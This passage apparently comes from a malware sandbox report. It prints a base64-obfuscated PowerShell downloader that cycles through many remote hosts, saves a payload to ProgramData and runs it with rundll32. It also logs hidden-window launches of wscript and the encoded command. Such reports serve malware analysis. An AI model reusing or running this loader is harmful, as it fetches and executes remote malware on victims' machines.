gAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBnAEEAYgB3AEIAdABBAEcAOABBAFoAUQBCAHkAQQBHADgAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAeQBBAEcAVQBBAGQAZwBCAHAAQQBHAFUAQQBkAHcAQQA9ACIAOwAkAGEAcABvAHMAdAByAG8AcABoAGkAegBlAGQAQwBvAG0AcABsAGUAeABpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEgASQBBAGIAdwBCAHcAQQBIAEkAQQBhAFEAQgBsAEEASABRAEEAWQBRAEIAeQBBAEcAawBBAFoAUQBCAHoAQQBGAE0AQQBjAFEAQgAxAEEARwBFAEEAYgBRAEIAbABBAEcAdwBBAGIAQQBCAGgAQQBIAFEAQQBaAFEAQQB1AEEARwBjAEEAYgB3AEIAcwBBAEcAWQBBAEIATgBVAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBRAEEAdQBBAEQARQBBAE4AZwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABFAEEATABnAEEAeABBAEQARQBBAE4AZwBBAD0AIgA7ACQAcABlAHIAagB1AHIAZQBkAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEUAQQBNAHcAQQB4AEEAQwA0AEEATwBBAEEAMABBAEMANABBAE0AUQBBADMAQQBEAEEAQQAiADsAJABUAG8AbwBtAGwAeQBNAGUAYwBoAGEAbgBvAHIAZQBjAGUAcAB0AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGIAdwBCAHQAQQBHAGsAQQBkAEEAQgBoAEEARwBRAEEAYQBnAEIAcABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgBqAEEASABVAEEAYgBBAEIAMABBAEgAVQBBAGMAZwBCAGgAQQBHAHcAQQBMAGcAQgBoAEEARwBNAEEAWQBRAEIAawBBAEcAVQBBAGIAUQBCADUAQQBBAD0APQB2AG0AYwBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEATABnAEEAeQBBAEQAUQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQB4AEEAQQA9AD0AdgBtAGMATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBPAEEAQQB1AEEARABVAEEATgBRAEEAdQBBAEQARQBBAE8AQQBBADQAQQBDADQAQQBOAHcAQQA0AEEAQQA9AD0AdgBtAGMATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBRAEIAWABBAEcAOABBAGMAZwBCAGsAQQBHAEkAQQBkAFEAQgBwAEEARwB3AEEAWgBBAEIAcABBAEcANABBAFoAdwBBAHUAQQBIAEkAQQBkAFEAQgBvAEEASABJAEEAIgA7ACQAdAByAGkAYwBrAGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATgBnAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA0AEEARABVAEEATABnAEEAMwBBAEQASQBBAEwAdwBCAHoAQQBEAEUAQQBlAEEAQgB1AEEAQwA4AEEAWgBnAEEAegBBAEUAawBBAHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQAawBBAE8AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATgBBAEEANABBAEMAOABBAGIAZwBCAEkAQQBDADgAQQBSAFEAQgBRAEEAQQA9AD0AdQBKAGkAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBPAFEAQQB5AEEAQwA4AEEAUwBnAEIAVQBBAEcAawBBAEwAdwBCAHAAQQBGAG8AQQBkAHcAQgBVAEEARQBZAEEAYwBBAEIAVwBBAEgAQQBBAFIAdwBBAHkAQQBEAEEAQQBWAEEAQQA9AHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEgAawBBAGEAQQBCAHgAQQBGAGMAQQBOAHcAQgBqAEEARQBZAEEAUQBRAEIASABBAEQAawBBAHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATgBnAEEANABBAEMAOABBAE8AUQBCAEQAQQBHADAAQQBPAFEAQgBGAEEARgBjAEEATAB3AEIARgBBAEcAdwBBAFEAdwBCAHMAQQBHAHcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABuAG8AbgBlAHgAdABlAG4AcwBpAHYAZQAgAGkAbgAgACQAdAByAGkAYwBrAGwAZQBkACAALQBzAHAAbABpAHQAIAAiAHUASgBpAGEAIgApACAAewAkAGMAbwBwAGgAbwB1AHMAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAHQAQQBHADgAQQBjAGcAQgBrAEEARQA0AEEAYgB3AEIAdQBBAEcAVQBBAGUAQQBCADAAQQBHAFUAQQBjAGcAQgB0AEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAPQBEAHEAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBZAFEAQgBrAEEARwB3AEEAYQBRAEIAbgBBAEcAZwBBAGQAQQBCAEMAQQBIAFUAQQBiAEEAQgBzAEEARwBnAEEAWgBRAEIAaABBAEcAUQBBAFoAUQBCAGsAQQBHAHcAQQBlAFEAQQB1AEEASABJAEEAWgBRAEIAawBBAEEAPQA9AEQAcQBYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAZwBBAGMAZwBCAHYAQQBHADAAQQBZAFEAQgAwAEEARwA4AEEAYwBBAEIAbwBBAEcAOABBAGMAZwBCAHYAQQBIAFUAQQBjAHcAQQB1AEEASABZAEEAWgBRAEIAdQBBAEgAUQBBAGQAUQBCAHkAQQBHAFUAQQBjAHcAQQA9ACIAOwAkAG4AbwBuAGMAbwBuAHYAZQByAHQAaQBiAGwAZQBuAGUAcwBzAEYAaQBkAGkAYwBpAG4AYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEARwA4AEEAYQBRAEIAcwBBAEcAVQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEARgBBAEEAYwBnAEIAbABBAEcATQBBAFkAUQBCAHUAQQBHAE0AQQBaAFEAQgB5AEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEEAPQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AQQBBADEAQQBDADQAQQBOAHcAQQAyAEEAQwA0AEEATgB3AEEAMQBBAEMANABBAE8AQQBBAHcAQQBBAD0APQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE0AQQBBAHUAQQBEAEUAQQBNAGcAQQAxAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBAEwAZwBBADIAQQBEAE0AQQAiADsAJAB1AG4AbQBlAGEAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEgATQBBAGEAUQBCAGgAQQBHADQAQQBhAFEAQgBqAEEARQBnAEEAYgB3AEIAdgBBAEgASQBBAFkAUQBCAG8AQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAWgBBAEIAcABBAEgASQBBAFoAUQBCAGoAQQBIAFEAQQBiAHcAQgB5AEEASABrAEEAZwB3AGkAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGoAQQBIAFUAQQBjAGcAQgBqAEEASABVAEEAYgBBAEIAcABBAEcAOABBAGMAdwBCAEIAQQBHAGMAQQBZAFEAQgB5AEEARwBrAEEAWQB3AEEAdQBBAEcAcwBBAGEAUQBCADAAQQBHAE0AQQBhAEEAQgBsAEEARwA0AEEAZwB3AGkAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFUAQQBZAHcAQgBqAEEARwB3AEEAWgBRAEIAegBBAEcAawBBAGIAdwBCAHMAQQBHADgAQQBaAHcAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMANABBAGIAUQBCADQAQQBBAD0APQBnAHcAaQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGEAUQBCAHMAQQBHAEUAQQBhAHcAQgBoAEEAQwA0AEEAYgBRAEIAbABBAEcANABBACIAOwB0AHIAeQAgAHsAJABTAHQAZQBtAHMAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAZQBRAEIAbABBAEcAdwBBAGEAUQBCAHUAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAMABBAEcAawBBAFkAdwBCAFYAQQBHADQAQQBZAFEAQgBuAEEASABJAEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBDADQAQQBZAGcAQgBsAEEASABRAEEAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAeQBBAEMANABBAE0AUQBBAHcAQQBEAGsAQQBMAGcAQQB4AEEARABJAEEATgB3AEEAPQBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEgASQBBAGQAUQBCAGsAQQBHAGMAQQBhAFEAQgB1AEEARwBjAEEAVgBRAEIAdQBBAEcAVQBBAGIAZwBCADEAQQBHADAAQQBaAFEAQgB5AEEARwBFAEEAZABBAEIAcABBAEgAWQBBAFoAUQBBAHUAQQBHAG8AQQBjAEEAQQA9AHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBZAEEAYQBRAEIAaABBAEcAUQBBAGQAUQBCAGoAQQBIAFEAQQBjAHcAQQB1AEEASABRAEEAYgB3AEIAMQBBAEgASQBBAGMAdwBBAD0AIgA7ACQAVAB1AHIAdABvAHMAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGIAdwBCADAAQQBHAGcAQQBaAFEAQgB2AEEASABJAEEAYQBRAEIAegBBAEgAUQBBAEwAZwBCAGoAQQBHADgAQQBTAGgARgBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYgBBAEIAbABBAEUATQBBAGIAdwBCAGgAQQBHAFEAQQBhAGcAQgAxAEEASABRAEEAWQBRAEIAdQBBAEgAUQBBAEwAZwBCAGkAQQBHAEUAQQBjAGcAQgBuAEEARwBFAEEAYQBRAEIAdQBBAEgATQBBAFMAaABGAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATgB3AEEAdQBBAEQAYwBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMQBBAEQAYwBBAFMAaABGAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAYQBRAEIAeQBBAEcANABBAFkAUQBCAHMAQQBGAGMAQQBhAFEAQgB5AEEARwBVAEEAYQBBAEIAaABBAEcAawBBAGMAZwBBAHUAQQBIAFUAQQBhAHcAQQA9ACIAOwAkAFUAbgBhAHQAdAByAGEAYwB0AGkAdgBlAFUAbgBhAHAAcAByAGUAYwBpAGEAdABpAHYAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABuAG8AbgBlAHgAdABlAG4AcwBpAHYAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFUAbgBhAHQAdAByAGEAYwB0AGkAdgBlAFUAbgBhAHAAcAByAGUAYwBpAGEAdABpAHYAZQAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAHAAaQB0AHQAbABlAHMAdABhAGYAZgBIAHkAcABlAHIAcwB1AGIAdABsAGUALgBoAGUAeABhAG0AZQByAG8AdQBzAEkAZABpAG8AdABpAHMAZQA7ACQASABlAG4AbQBvAGwAZAB5AE0AdQBnAGcAaQBuAGcAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGMAdwBCADUAQQBHAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEgAUQBBAGMAZwBCADUAQQBFAFUAQQBZAGcAQgBqAEEARwBFAEEAYwB3AEIAagBBAEMANABBAGQAZwBCAGoAQQBBAD0APQA9AEsASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAGsAQQBMAGcAQQAyAEEARABNAEEATABnAEEANQBBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBNAEEAQQA9ACIAOwAkAGgAbwBvAGQAdwBpAG4AawBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAE0AQQBMAGcAQQB4AEEARABNAEEATQBRAEEAPQBFAHoAVwB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAMwBBAEQARQBBAEwAZwBBADUAQQBEAEkAQQAiADsAJABCAGEAegBhAGEAcgBOAG8AbgBlAHgAYQBnAGcAZQByAGEAdABpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcANABBAGIAdwBCAHUAQQBIAEkAQQBZAFEAQgBrAEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBHADAAQQBaAFEAQQA9AGIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQA0AEEARABFAEEATABnAEEAeQBBAEQAUQBBAE0AZwBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAGkAdAB0AGwAZQBzAHQAYQBmAGYASAB5AHAAZQByAHMAdQBiAHQAbABlAC4AaABlAHgAYQBtAGUAcgBvAHUAcwBJAGQAaQBvAHQAaQBzAGUAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADYAMgA3ADAAOQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEgATQBBAGMAQQBCAHAAQQBIAFEAQQBkAEEAQgBzAEEARwBVAEEAYwB3AEIAMABBAEcARQBBAFoAZwBCAG0AQQBFAGcAQQBlAFEAQgB3AEEARwBVAEEAYwBnAEIAegBBAEgAVQBBAFkAZwBCADAAQQBHAHcAQQBaAFEAQQB1AEEARwBnAEEAWgBRAEIANABBAEcARQBBAGIAUQBCAGwAQQBIAEkAQQBiAHcAQgAxAEEASABNAEEAUwBRAEIAawBBAEcAawBBAGIAdwBCADAAQQBHAGsAQQBjAHcAQgBsAEEAQwB3AEEAZABnAEIAcABBAEgAQQBBAGMAdwBBADcAQQBFADAAQQBTAFEAQgBVAEEARQB3AEEAYQBRAEIAagBBAEcAVQBBAGIAZwBCAHoAQQBHAFUAQQAiADsAJABDAG8AbQBiAGUAcgBzAFcAYQByAGQAZQBuAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcARQBBAGQAQQBCAGwAQQBIAGMAQQBZAFEAQgA1AEEARwAwAEEAWQBRAEIAdQBBAEUAUQBBAFoAUQBCAGgAQQBHAFkAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAdQBBAEgAUQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQA9AGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBzAEEAWgBRAEIAMABBAEcAOABBAFoAdwBCAGwAQQBHADQAQQBSAFEAQgB0AEEARwA4AEEAWgBBAEIAcABBAEcANABBAGMAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBnAEEAIgA7ACQAYwBhAHIAYQBiAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcAawBBAGIAUQBCAGgAQQBHADQAQQBkAEEAQgB2AEEASABBAEEAZABRAEIAegBBAEYAUQBBAGIAdwBCAHkAQQBIAEkAQQBaAFEAQgBtAEEASABrAEEATABnAEIAdABBAEcAOABBAFoAQQBCAGgAQQBBAD0APQB4AGgASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFcAQQBHAGsAQQBjAHcAQgBqAEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCADAAQQBHADgAQQBjAGcAQQB1AEEARwA0AEEAWQBRAEIAMgBBAEgAawBBAHgAaABLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAWQBBAEwAZwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABFAEEATwBRAEEAdwBBAEMANABBAE0AZwBBAHgAQQBEAFEAQQB4AGgASwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGcAQQBlAFEAQgB3AEEARwBVAEEAYwBnAEIAdwBBAEgASQBBAGIAdwBCAHcAQQBHAGcAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEcAMABBAFkAUQBCAHUAQQBHAEUAQQBaAHcAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBACIAOwAkAFMAeQBuAGEAbgBnAGkAYQBsAEMAbwByAGIAZQBsAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGsAQQBNAFEAQQB1AEEARABnAEEATQBnAEEAdQBBAEQASQBBAE0AZwBBADEAQQBBAD0APQBLAEQAYQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFkAQQBaAFEAQgB5AEEARwBJAEEAWQBRAEIAcwBBAEcAawBBAGMAdwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAUwBBAEIAbABBAEgASQBBAFoAQQBCAGwAQQBIAEkAQQBjAHcAQQB1AEEARwB3AEEAYQBRAEIAdABBAEcAawBBAGQAQQBCAGwAQQBHAFEAQQBLAEQAYQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBsAEEARwA0AEEAZABRAEIAdABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgBrAEEAQwA0AEEAYQB3AEIAcABBAEgAUQBBAFkAdwBCAG8AQQBHAFUAQQBiAGcAQQA9AEsARABhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBRAEEAeABBAEQARQBBAEwAZwBBADAAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewAkAEwAdQBuAGMAaABlAG8AbgBlAHQAdABlAHMATQBlAG4AdABoAGEAYwBlAGEAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAUQBBAGMAZwBCADEAQQBHAFEAQQBaAHcAQgBwAEEARwA0AEEAWgB3AEIAVgBBAEcANABBAFoAUQBCAHUAQQBIAFUAQQBiAFEAQgBsAEEASABJAEEAWQBRAEIAMABBAEcAawBBAGQAZwBCAGwAQQBDADQAQQBjAGcAQgB2AEEARwBNAEEAYQB3AEIAegBBAEEAPQA9ACIAOwAkAGgAZQBuAGMAaABtAGUAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQA9AEYAVwBNAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATwBRAEEAdQBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB4AEEARABVAEEATABnAEEAeQBBAEQAUQBBAE8AUQBBAD0ARgBXAE0AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEIAQQBIAE0AQQBkAHcAQgBoAEEARwBrAEEAYgBBAEIAVABBAEgAVQBBAFkAZwBCAGgAQQBIAFUAQQBaAEEAQQB1AEEARwB3AEEAYQBRAEIAdABBAEcAOABBACIAOwB9AH0AJABpAGcAbgBhAHQAaQB1AHMARgBsAHUAdABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBPAFEAQQB1AEEARABnAEEATgB3AEEAdQBBAEQARQBBAE4AUQBBADQAQQBDADQAQQBPAEEAQQA1AEEAQQA9AD0AdwBDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcATQBBAGMAZwBCAHYAQQBHAEkAQQBhAFEAQgB6AEEAQwA0AEEAYgBRAEIAaQBBAEcARQBBACIAOwA="

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 24, 2023, 11:04 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\ProgramData\Teenagers.js" CultchPatrilineal Unrowdy Misproposal pseudobchia filepath: wscript	1	1	0
ShellExecuteExW May 24, 2023, 11:04 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "JABwAGEAbABtAGUAbABsAG8AaQBkAFMAZQBuAHMAYQB0AGkAbwBuAGkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAawBBAGIAZwBCAGwAQQBIAGcAQQBiAHcAQgB5AEEARwBFAEEAWQBnAEIAcwBBAEcAVQBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBKAEEASABNAEEAYgB3AEIAeABBAEgAVQBBAGEAUQBCAHUAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAHcAQQB1AEEARABJAEEATQB3AEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGMAQQBMAGcAQQB5AEEARABFAEEATgB3AEEAPQBKAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAaQBBAEgASQBBAGIAdwBCAGgAQQBHAE0AQQBhAEEAQgBUAEEARwA0AEEAYgB3AEIAaQBBAEcASQBBAGEAUQBCAHoAQQBHAGcAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAdQBBAEcATQBBAFkAUQBCAHQAQQBHAFUAQQBjAGcAQgBoAEEAQQA9AD0ASgBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE8AQQBBAHUAQQBEAEkAQQBNAGcAQQB5AEEAQwA0AEEATgBRAEEAdwBBAEMANABBAE0AUQBBADAAQQBEAFUAQQAiADsAJABsAGkAcQB1AGUAZgBpAGUAcwBVAG4AdwBhAGQAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgB3AEEAegBBAEMANABBAE0AUQBBAHgAQQBEAGcAQQBMAGcAQQA0AEEARABRAEEAVgBMAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBBAEEAdQBBAEQARQBBAE4AdwBBADAAQQBDADQAQQBOAHcAQQA0AEEAQwA0AEEATgB3AEEANQBBAEEAPQA9AFYATAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAFoAUQBCADAAQQBIAFEAQQBhAFEAQgB0AEEARwBFAEEATABnAEIAagBBAEcARQBBAGMAdwBCAHAAQQBHADQAQQBiAHcAQQA9AFYATAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAFEAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAdwBBAEMANABBAE0AUQBBADEAQQBEAGsAQQAiADsAJABzAHQAbwBjAGsAbQBhAGsAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBJAEEAYgB3AEIAeQBBAEcAYwBBAGEAQQBCAHAAQQBGAEkAQQBaAFEAQgBqAEEARwA4AEEAYgBnAEIAbQBBAEcAawBBAGMAdwBCAGoAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGoAQQBHADgAQQBiAGcAQgB6AEEASABVAEEAYgBRAEIAbABBAEcAUQBBAEwAZwBCAG4AQQBHADgAQQBiAEEAQgBrAEEAQQA9AD0AcgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEARwBVAEEAZABBAEIAeQBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBlAFEAQgBGAEEASABnAEEAZABBAEIAeQBBAEgAVQBBAGMAdwBCAHAA